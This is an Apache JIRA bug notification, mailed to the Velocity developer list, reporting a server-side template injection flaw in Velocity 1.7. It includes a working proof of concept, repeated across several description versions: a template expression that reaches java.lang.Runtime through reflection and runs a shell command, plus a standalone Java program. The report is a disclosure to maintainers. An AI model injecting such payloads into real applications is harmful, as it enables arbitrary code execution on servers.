[jira] [Updated] (VELOCITY-877) Access to critical fields/methods allows execution of arbitrary code ('Template Injection')

Mon, 15 Aug 2016 08:30:30 -0700 

     [ 
https://issues.apache.org/jira/browse/VELOCITY-877?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Markus Wulftange updated VELOCITY-877:
--------------------------------------
    Description: 
It is possible to reference certain fields/methods, which eventually allow the 
execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
any variable, it is possible to get the variable's class object. This can be 
extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the 
'{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

        public static void main(String[] args) {
                Context context = new VelocityContext();
                context.put("var", "foo");
                String instring = 
"$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
                Velocity.evaluate(context, null, "templateName", instring);
        }

}
{code}

This issue has already been made public in the past by James Kettle in August 
2015 (see 
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
 and via CVE-2015-5603 (see 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
others.

  was:
It is possible to reference certain fields/methods, which eventually allow the 
execution of arbitrary methods.

For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
any variable, it is possible to get the variable's class object. This can be 
extended to get arbitrary class objects and execute arbitrary methods.

For example, the following statement results in the execution of the 
'{{xterm}}':
{code}
$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
{code}

As a standalone:

{code:java}
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.Velocity;
import org.apache.velocity.context.Context;

public class VelocityTest {

        public static void main(String[] args) {
                Context context = new VelocityContext();
                context.put("var", "foo");
                String instring = 
"#set($String=$var.class.class.forName('java.lang.String'))"
                                + 
"#set($Character=$var.class.class.forName('java.lang.Character'))"
                                + 
"#set($Runtime=$var.class.class.forName('java.lang.Runtime'))"
                                + 
"#set($proc=$Runtime.getRuntime().exec('xterm'))$proc.waitFor()";
                Velocity.evaluate(context, null, "templateName", instring);
        }

}
{code}

This issue has already been made public in the past by James Kettle in August 
2015 (see 
http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
 and via CVE-2015-5603 (see 
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
others.


> Access to critical fields/methods allows execution of arbitrary code 
> ('Template Injection')
> -------------------------------------------------------------------------------------------
>
>                 Key: VELOCITY-877
>                 URL: https://issues.apache.org/jira/browse/VELOCITY-877
>             Project: Velocity
>          Issue Type: Bug
>          Components: Engine
>    Affects Versions: 1.7
>            Reporter: Markus Wulftange
>            Priority: Critical
>              Labels: security
>
> It is possible to reference certain fields/methods, which eventually allow 
> the execution of arbitrary methods.
> For example, by utilizing the '{{class}}' field or '{{getClass()}}' method of 
> any variable, it is possible to get the variable's class object. This can be 
> extended to get arbitrary class objects and execute arbitrary methods.
> For example, the following statement results in the execution of the 
> '{{xterm}}':
> {code}
> $var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()
> {code}
> As a standalone:
> {code:java}
> import org.apache.velocity.VelocityContext;
> import org.apache.velocity.app.Velocity;
> import org.apache.velocity.context.Context;
> public class VelocityTest {
>       public static void main(String[] args) {
>               Context context = new VelocityContext();
>               context.put("var", "foo");
>               String instring = 
> "$var.class.class.forName('java.lang.Runtime').getRuntime().exec('xterm').waitFor()";
>               Velocity.evaluate(context, null, "templateName", instring);
>       }
> }
> {code}
> This issue has already been made public in the past by James Kettle in August 
> 2015 (see 
> http://blog.portswigger.net/2015/08/server-side-template-injection.html#Velocity)
>  and via CVE-2015-5603 (see 
> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5603) and possibly 
> others.



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)

---------------------------------------------------------------------
To unsubscribe, e-mail: dev-unsubscr...@velocity.apache.org
For additional commands, e-mail: dev-h...@velocity.apache.org

Reply via email to